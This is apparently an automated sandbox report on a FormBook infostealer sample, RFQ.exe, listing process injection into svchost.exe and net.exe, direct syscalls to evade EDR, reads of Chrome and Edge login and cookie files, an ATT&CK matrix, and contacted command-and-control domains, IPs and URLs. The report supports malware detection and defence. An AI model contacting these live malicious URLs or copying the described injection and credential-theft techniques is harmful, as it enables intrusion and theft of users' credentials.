Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0365E8C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03630887 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_036BC89D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0365AF69 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_036D2F60 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\RFQ.exe | Code function: 1_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock
Source: C:\Users\user\Desktop\RFQ.exe | Code function: 1_2_0041F250 SetUnhandledExceptionFilter
Source: C:\Users\user\Desktop\RFQ.exe | Code function: 1_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\Desktop\RFQ.exe | Code function: 1_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter

HIPS / PFW / Operating System Protection Evasion
Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe | NtWriteVirtualMemory: Direct from: 0x77762E3C
Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe | NtMapViewOfSection: Direct from: 0x77762D1C
Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe | NtNotifyChangeKey: Direct from: 0x77763C2C
Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe | NtCreateMutant: Direct from: 0x777635CC
Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe | NtResumeThread: Direct from: 0x777636AC
Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe | NtQuerySystemInformation: Direct from: 0x77762DFC
Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe | NtAllocateVirtualMemory: Direct from: 0x77762BFC
Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe | NtReadFile: Direct from: 0x77762ADC
Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe | NtDelayExecution: Direct from: 0x77762DDC
Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe | NtWriteVirtualMemory: Direct from: 0x7776490C
Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe | NtQueryInformationProcess: Direct from: 0x77762C26
Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe | NtResumeThread: Direct from: 0x77762FBC
Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe | NtCreateUserProcess: Direct from: 0x7776371C
Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe | NtSetInformationThread: Direct from: 0x777563F9
Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe | NtOpenKeyEx: Direct from: 0x77763C9C
Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe | NtSetInformationThread: Direct from: 0x77762B4C
Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe | NtQueryAttributesFile: Direct from: 0x77762E6C
Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe | NtClose: Direct from: 0x77762B6C
Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe | NtReadVirtualMemory: Direct from: 0x77762E8C
Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe | NtCreateKey: Direct from: 0x77762C6C
Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe | NtQuerySystemInformation: Direct from: 0x777648CC
Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe | NtAllocateVirtualMemory: Direct from: 0x777648EC
Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe | NtQueryVolumeInformationFile: Direct from: 0x77762F2C
Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe | NtOpenSection: Direct from: 0x77762E0C
Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe | NtDeviceIoControlFile: Direct from: 0x77762AEC
Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe | NtQueryValueKey: Direct from: 0x77762BEC
Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe | NtQueryInformationToken: Direct from: 0x77762CAC
Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe | NtTerminateThread: Direct from: 0x77762FCC
Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe | NtCreateFile: Direct from: 0x77762FEC
Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe | NtOpenFile: Direct from: 0x77762DCC
Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe | NtOpenKeyEx: Direct from: 0x77762B9C
Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe | NtSetInformationProcess: Direct from: 0x77762C5C
Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe | NtProtectVirtualMemory: Direct from: 0x77762F9C
Source: C:\Users\user\Desktop\RFQ.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\net.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\net.exe | Section loaded: NULL target: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe protection: read write
Source: C:\Windows\SysWOW64\net.exe | Section loaded: NULL target: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\net.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\net.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\net.exe | Thread register set: target process: 7812
Source: C:\Windows\SysWOW64\net.exe | Thread APC queued: target process: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe
Source: C:\Users\user\Desktop\RFQ.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: B64008
Source: C:\Users\user\Desktop\RFQ.exe | Code function: 1_2_00436CD7 LogonUserW
Source: C:\Users\user\Desktop\RFQ.exe | Code function: 1_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW
Source: C:\Users\user\Desktop\RFQ.exe | Code function: 1_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput
Source: C:\Users\user\Desktop\RFQ.exe | Code function: 1_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event
Source: C:\Users\user\Desktop\RFQ.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\RFQ.exe"
Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\SysWOW64\net.exe"
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\RFQ.exe | Code function: 1_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
Source: RFQ.exe, rNgGAKxrFRkFYx.exe, 00000009.00000002.3128003486.00000000016B1000.00000002.00000001.00040000.00000000.sdmp, rNgGAKxrFRkFYx.exe, 00000009.00000000.1356700531.00000000016B0000.00000002.00000001.00040000.00000000.sdmp, rNgGAKxrFRkFYx.exe, 0000000C.00000000.1575922606.0000000000E10000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: rNgGAKxrFRkFYx.exe, 00000009.00000002.3128003486.00000000016B1000.00000002.00000001.00040000.00000000.sdmp, rNgGAKxrFRkFYx.exe, 00000009.00000000.1356700531.00000000016B0000.00000002.00000001.00040000.00000000.sdmp, rNgGAKxrFRkFYx.exe, 0000000C.00000000.1575922606.0000000000E10000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
Source: rNgGAKxrFRkFYx.exe, 00000009.00000002.3128003486.00000000016B1000.00000002.00000001.00040000.00000000.sdmp, rNgGAKxrFRkFYx.exe, 00000009.00000000.1356700531.00000000016B0000.00000002.00000001.00040000.00000000.sdmp, rNgGAKxrFRkFYx.exe, 0000000C.00000000.1575922606.0000000000E10000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: ?Program Manager
Source: rNgGAKxrFRkFYx.exe, 00000009.00000002.3128003486.00000000016B1000.00000002.00000001.00040000.00000000.sdmp, rNgGAKxrFRkFYx.exe, 00000009.00000000.1356700531.00000000016B0000.00000002.00000001.00040000.00000000.sdmp, rNgGAKxrFRkFYx.exe, 0000000C.00000000.1575922606.0000000000E10000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
Source: RFQ.exe | Binary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
Source: C:\Users\user\Desktop\RFQ.exe | Code function: 1_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW
Source: C:\Users\user\Desktop\RFQ.exe | Code function: 1_2_00472C3F GetUserNameW
Source: C:\Users\user\Desktop\RFQ.exe | Code function: 1_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte
Source: C:\Users\user\Desktop\RFQ.exe | Code function: 1_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary

Stealing of Sensitive Information
Source: Yara match | File source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000B.00000002.3128924724.00000000034F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.1512156269.0000000009040000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.3131106553.0000000004C10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.1506663824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.3129083519.0000000003650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.1507308924.00000000061A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.3121215291.00000000030A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.3129016508.0000000005600000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\net.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\net.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\net.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\net.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\net.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\net.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\net.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\net.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\net.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: RFQ.exe | Binary or memory string: WIN_XP
Source: RFQ.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
Source: RFQ.exe | Binary or memory string: WIN_XPe
Source: RFQ.exe | Binary or memory string: WIN_VISTA
Source: RFQ.exe | Binary or memory string: WIN_7
Source: RFQ.exe | Binary or memory string: WIN_8

Remote Access Functionality
Source: Yara match | File source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000B.00000002.3128924724.00000000034F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.1512156269.0000000009040000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.3131106553.0000000004C10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.1506663824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.3129083519.0000000003650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.1507308924.00000000061A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.3121215291.00000000030A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.3129016508.0000000005600000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\RFQ.exe | Code function: 1_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket
Source: C:\Users\user\Desktop\RFQ.exe | Code function: 1_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket
Source: C:\Users\user\Desktop\RFQ.exe | Code function: 1_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject
MITRE ATT&CK Matrix (one line per tactic; a technique matched by this sample's signatures carries the number of matching signatures in parentheses, the remaining cells are the unmatched entries of the matrix)

Reconnaissance: Gather Victim Identity Information | Credentials | Email Addresses | Employee Names | Gather Victim Network Information | Domain Properties | DNS | Network Trust Dependencies | Network Topology
Resource Development: Acquire Infrastructure | Domains | DNS Server | Virtual Private Server | Server | Botnet | Web Services | Serverless | Malvertising
Initial Access: Valid Accounts (2) | Default Accounts | Domain Accounts | Local Accounts | Cloud Accounts | Replication Through Removable Media | External Remote Services | Drive-by Compromise | Exploit Public-Facing Application
Execution: Native API (2) | Scheduled Task/Job | At | Cron | Launchd | Scheduled Task | Systemd Timers | Container Orchestration Job | Command and Scripting Interpreter
Persistence: DLL Side-Loading (1) | Valid Accounts (2) | Logon Script (Windows) | Login Hook | Network Logon Script | RC Scripts | Startup Items | Scheduled Task/Job | At
Privilege Escalation: Exploitation for Privilege Escalation (1) | Abuse Elevation Control Mechanism (1) | DLL Side-Loading (1) | Valid Accounts (2) | Access Token Manipulation (21) | Process Injection (412) | Startup Items | Scheduled Task/Job | At
Defense Evasion: Disable or Modify Tools (1) | Deobfuscate/Decode Files or Information (1) | Abuse Elevation Control Mechanism (1) | Obfuscated Files or Information (3) | DLL Side-Loading (1) | Valid Accounts (2) | Virtualization/Sandbox Evasion (2) | Access Token Manipulation (21) | Process Injection (412)
Credential Access: OS Credential Dumping (1) | Input Capture (21) | Security Account Manager | NTDS | LSA Secrets | Cached Domain Credentials | DCSync | Proc Filesystem | /etc/passwd and /etc/shadow
Discovery: System Time Discovery (2) | Account Discovery (1) | File and Directory Discovery (2) | System Information Discovery (16) | Security Software Discovery (141) | Virtualization/Sandbox Evasion (2) | Process Discovery (3) | Application Window Discovery (11) | System Owner/User Discovery (1)
Lateral Movement: Remote Services | Remote Desktop Protocol | SMB/Windows Admin Shares | Distributed Component Object Model | SSH | VNC | Windows Remote Management | Cloud Services | Direct Cloud VM Connections
Collection: Archive Collected Data (1) | Data from Local System (1) | Email Collection (1) | Input Capture (21) | Clipboard Data (3) | GUI Input Capture | Web Portal Capture | Credential API Hooking | Data Staged
Command and Control: Ingress Tool Transfer (4) | Encrypted Channel (1) | Non-Application Layer Protocol (4) | Application Layer Protocol (4) | Fallback Channels | Multiband Communication | Commonly Used Port | Application Layer Protocol | Web Protocols
Exfiltration: Exfiltration Over Other Network Medium | Exfiltration Over Bluetooth | Automated Exfiltration | Traffic Duplication | Scheduled Transfer | Data Transfer Size Limits | Exfiltration Over C2 Channel | Exfiltration Over Alternative Protocol | Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: System Shutdown/Reboot (1) | Network Denial of Service | Data Encrypted for Impact | Data Destruction | Data Encrypted for Impact | Service Stop | Inhibit System Recovery | Defacement | Internal Defacement
Behavior Graph (ID: 1551421, Sample: RFQ.exe, Startdate: 07/11/2024, Architecture: WINDOWS, Score: 100)
Top-level signatures: Antivirus detection for URL or domain; Yara detected FormBook; Machine Learning detection for sample; 2 other signatures
Top-level DNS/IP: www.wukong.college; www.vnxoso88.art; 14 other IPs or domains
Process tree:
  RFQ.exe (started): Writes to foreign memory regions; Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces
    svchost.exe (started): Maps a DLL or memory area into another process
      rNgGAKxrFRkFYx.exe (injected): Found direct / indirect Syscall (likely to bypass EDR)
        net.exe (started): Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
          rNgGAKxrFRkFYx.exe (injected): Found direct / indirect Syscall (likely to bypass EDR); DNS/IP: www.pluribiz.life 209.74.64.58 (ports 49854, 49855, 49856; MULTIBAND-NEWHOPEUS, United States), www.evoo.website 128.65.195.180 (ports 49862, 49863, 49864; INFOMANIAK-ASCH, Switzerland), 6 other IPs or domains
          firefox.exe (started)

Source | Detection | Scanner | Label | Link
RFQ.exe | 100% | Joe Sandbox ML | |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
http://www.bio-thymus.com/ezyn/?7j=JlwzIZwI1xJFqouTAqQiGi5FnZJep/DAQQtIf/F0T8wp//PaftbgsqCDWgKyQb/wN3l14QHm5S9DGTsxEdEMKN8+Alsd/uAlfqbny7J4c2YDLjDocbldGRQwWRw5cBSMls9XvUBQui7N&UvgPX=o0HdzhbpI6gx | 0% | Avira URL Cloud | safe |
http://www.astorg-group.info/vdvc/?7j=5MdYmwdbGD0BDYmaOdq/odi9Xn3PsoNjMQAWnbwvceTCKyge8o8IPCpC1t6KQbJzoNOqWqsbTcqy0exGkczRfNZBZZEaN8IgdCZSECanEbYOAZ+JnzF5T5/sjPpe9MQhZicEiQ4HPQfz&UvgPX=o0HdzhbpI6gx | 0% | Avira URL Cloud | safe |
http://www.4nk.education/gnvu/?7j=nxCjiJTB74oIWabUJfF6YI/8fUWqiaBkhoi4dayZTBfl5+e+2r+tNQPR6bJXqR1fUXmtsCJ3OPXRNkZ1wk4FgkX779Cut1JrjhVNutQKYieetaE9VDmnk+XmhNaaOMMHcA19omccG+Ez&UvgPX=o0HdzhbpI6gx | 100% | Avira URL Cloud | malware |
http://www.fiqsth.vip/0m8a/ | 0% | Avira URL Cloud | safe |
http://www.evoo.website/293d/ | 0% | Avira URL Cloud | safe |
https://whois.gandi.net/en/results?search=4nk.education | 0% | Avira URL Cloud | safe |
http://www.wukong.college/9ezc/ | 0% | Avira URL Cloud | safe |
http://www.4nk.education/gnvu/ | 100% | Avira URL Cloud | malware |
http://www.kdtzhb.top/1iqa/?7j=EIYp+2qno3OyA6JRko7EkEQRXSdht8qBodEq6zBYd0MwR3tzbR3TIlddc30TsymXBRZ2l1bBHfxTXhxkRZRQgVC25Yrin2Sqkv5Fwdk+dvafD+ucZYRStKeuK1fTd52HaDhfGqTyDFD4&UvgPX=o0HdzhbpI6gx | 0% | Avira URL Cloud | safe |
http://www.wukong.college | 0% | Avira URL Cloud | safe |
http://www.kdtzhb.top/1iqa/ | 0% | Avira URL Cloud | safe |
